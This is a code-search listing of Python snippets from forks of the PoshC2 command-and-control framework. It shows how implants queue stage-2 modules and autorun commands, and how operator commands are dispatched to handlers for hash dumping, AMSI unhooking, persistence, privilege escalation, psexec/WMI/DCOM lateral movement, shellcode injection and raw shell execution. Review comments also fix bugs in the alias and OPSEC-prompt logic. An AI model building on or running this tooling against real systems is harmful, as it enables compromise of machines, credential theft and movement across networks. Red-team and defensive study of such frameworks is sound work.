ファイル: Implant.py プロジェクト: sunzu94/PoshC2-Framework
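 def autoruns(self):
     """Queue stage-2 module loads for this implant's pivot type, then queue
     every stored autorun command.

     Reads ``self.Pivot`` (substring-matched against the pivot tokens below),
     ``self.RandomURI`` (the implant key every task is queued under) and
     ``self.IPAddress`` (shown in the label of pivoted implants).  Module
     loads go through ``new_task``/``update_mods``; stored autoruns come from
     ``get_autoruns()``, whose second column is treated as the command text.
     Presumably invoked once when an implant registers -- verify against the
     caller.
     """
     pivot = self.Pivot
     uri = self.RandomURI

     if "C#" in pivot:
         new_task("loadmodule Stage2-Core.exe", "autoruns", uri)
         new_task("loadmodule PwrStatusTracker.dll", "autoruns", uri)
         update_mods("Stage2-Core.exe", uri)
         update_mods("PwrStatusTracker.dll", uri)
         new_task("loadpowerstatus", "autoruns", uri)
         update_label("PSM", uri)
     if "PS" in pivot:
         new_task("loadmodule Stage2-Core.ps1", "autoruns", uri)
         update_mods("Stage2-Core.ps1", uri)
     # "PBind Pivot" and plain "PB" implants were handled by two branches that
     # did exactly the same thing (their loadmodule tasks were commented out).
     # "PB" is a substring of "PBind Pivot", so a single test covers both.
     if "PB" in pivot:
         update_label("Parent: %s" % self.IPAddress, uri)
         update_mods("Stage2-Core.exe", uri)
     if "FC" in pivot:
         update_label("Parent: %s" % self.IPAddress, uri)
         new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns", uri)
         update_mods("Stage2-Core.exe", uri)

     # NOTE(review): stored autoruns are queued verbatim, with none of the
     # OPSEC prompting the interactive command handler applies.  Anything that
     # reaches the autoruns store is tasked whenever this method fires.
     for autorun in get_autoruns() or ():
         run_autoloads(autorun[1], uri, "autoruns")
         new_task(autorun[1], "autoruns", uri)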
ファイル: Implant.py プロジェクト: asdfasadfasfa/Albert
 def autoruns(self):
     """Queue the stage-2 core module matching this implant's pivot type,
     then queue every stored autorun command.

     Checks ``self.Pivot`` for the "C#" and "PS" tokens (a pivot string
     containing both gets both modules, C# first), queues a ``loadmodule``
     task under ``self.RandomURI`` and records the module via
     ``update_mods``.  Rows returned by ``get_autoruns()`` are then queued
     using their second column as the command text.
     """
     uri = self.RandomURI
     stage2_by_pivot = (("C#", "Stage2-Core.exe"), ("PS", "Stage2-Core.ps1"))
     for token, module in stage2_by_pivot:
         if token not in self.Pivot:
             continue
         new_task("loadmodule %s" % module, "autoruns", uri)
         update_mods(module, uri)

     pending = get_autoruns()
     if not pending:
         return
     for row in pending:
         run_autoloads(row[1], uri, "autoruns")
         new_task(row[1], "autoruns", uri)
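def handle_ps_command(command, user, randomuri, implant_id):
    """Dispatch one operator console command for a PowerShell implant.

    Args:
        command: raw command text typed by the operator.
        user: operator name, passed through to every ``do_*`` handler.
        randomuri: implant key used to queue tasks.
        implant_id: accepted for interface compatibility; not used here.

    Returns:
        None.  The matching ``do_*`` handler runs for its side effects; any
        unrecognised non-empty command is handed to ``do_shell`` verbatim.
    """
    # Best-effort: make sure the PowerShell stage-2 module is loaded before
    # the command runs.  Failure is reported, not fatal.
    try:
        check_module_loaded("Stage2-Core.ps1", randomuri, user)
    except Exception as e:
        print_bad("Error loading Stage2-Core.ps1: %s" % e)

    command = command.strip()

    # Alias mapping.  The original called str.replace() and discarded the
    # result, so aliases never took effect.  Rewrite only the matched prefix;
    # first matching alias wins.
    for alias in ps_alias:
        if command.startswith(alias[0]):
            command = alias[1] + command[len(alias[0]):]
            break

    run_autoloads(command, randomuri, user)

    # OPSEC gate.  The prompt advertises "(y/N)", so anything that is not an
    # explicit yes cancels.  Previously only an exact "n" or an empty reply
    # cancelled; "no", "N " or a typo ran the flagged command anyway.
    for opsec in ps_opsec:
        if command.startswith(opsec):
            print_bad("**OPSEC Warning**")
            ri = input("Do you want to continue running - %s? (y/N) " %
                       command)
            if ri.strip().lower() not in ("y", "yes"):
                command = ""
            break

    # Dispatch tables are built per call so the do_* handlers are resolved
    # late, exactly as the original if/elif chain did (they may be defined
    # further down the module).
    exact = {
        "help": do_help,
        "kill-implant": do_kill_implant,
        "exit": do_kill_implant,
        "listmodules": do_listmodules,
        "modulesloaded": do_modulesloaded,
        "ps": do_ps,
        "hashdump": do_hashdump,
        "stopdaisy": do_stopdaisy,
        "stopsocks": do_stopsocks,
        "sharpsocks": do_sharpsocks,
    }
    handler = exact.get(command)

    if handler is None:
        # Order matters: a more specific prefix must precede its shorter
        # counterpart (e.g. "get-system-withproxy" before "get-system",
        # "loadmoduleforce" before "loadmodule").  Trailing spaces are part of
        # the prefix where the original had them.
        prefixed = (
            ("unhook-amsi", do_unhook_amsi),
            ("searchhelp", do_searchhelp),
            ("download-files ", do_download_files),
            ("install-servicelevel-persistencewithproxy",
             do_install_servicelevel_persistencewithproxy),
            # NOTE(review): the non-proxy variant also routes to the
            # ...withproxy handler, as in the original; confirm whether a
            # dedicated handler exists and is meant to be used here.
            ("install-servicelevel-persistence",
             do_install_servicelevel_persistencewithproxy),
            ("remove-servicelevel-persistence",
             do_remove_servicelevel_persistence),
            ("get-implantworkingdirectory", do_get_implantworkingdirectory),
            ("get-system-withproxy", do_get_system_withproxy),
            ("get-system-withdaisy", do_get_system_withdaisy),
            ("get-system", do_get_system),
            ("invoke-psexec ", do_invoke_psexec),
            ("invoke-smbexec ", do_invoke_psexec),
            ("invoke-psexecproxypayload ", do_invoke_psexecproxypayload),
            ("invoke-psexecdaisypayload ", do_invoke_psexecdaisypayload),
            ("invoke-psexecpayload ", do_invoke_psexecpayload),
            ("invoke-wmiexec ", do_invoke_wmiexec),
            ("invoke-wmijspbindpayload ", do_invoke_wmijsbindpayload),
            ("invoke-wmijsproxypayload ", do_invoke_wmijsproxypayload),
            ("invoke-wmijsdaisypayload ", do_invoke_wmijsdaisypayload),
            ("invoke-wmijspayload ", do_invoke_wmijspayload),
            ("invoke-wmiproxypayload ", do_invoke_wmiproxypayload),
            ("invoke-wmidaisypayload ", do_invoke_wmidaisypayload),
            ("invoke-wmipayload ", do_invoke_wmipayload),
            ("invoke-dcomproxypayload ", do_invoke_dcomproxypayload),
            ("invoke-dcomdaisypayload ", do_invoke_dcomdaisypayload),
            ("invoke-dcompayload ", do_invoke_dcompayload),
            ("invoke-runas ", do_invoke_runas),
            ("invoke-runasdaisypayload", do_invoke_runasdaisypayload),
            ("invoke-runasproxypayload", do_invoke_runasproxypayload),
            ("invoke-runaspayload", do_invoke_runaspayload),
            ("get-pid", do_get_pid),
            ("upload-file", do_upload_file),
            ("migrate", do_migrate),
            # handler name is misspelled in the module; kept as-is
            ("loadmoduleforce", do_loadmoudleforce),
            ("loadmodule", do_loadmodule),
            ("pbind-loadmodule", do_pbind_loadmodule),
            ("invoke-daisychain", do_invoke_daisychain),
            ("inject-shellcode", do_inject_shellcode),
            ("reversedns", do_reversedns),
        )
        for prefix, fn in prefixed:
            if command.startswith(prefix):
                handler = fn
                break

    if handler is not None:
        handler(user, command, randomuri)
    elif command:
        # Anything unrecognised (and not cancelled by the OPSEC gate) goes to
        # the implant as a raw shell command.
        do_shell(user, command, randomuri)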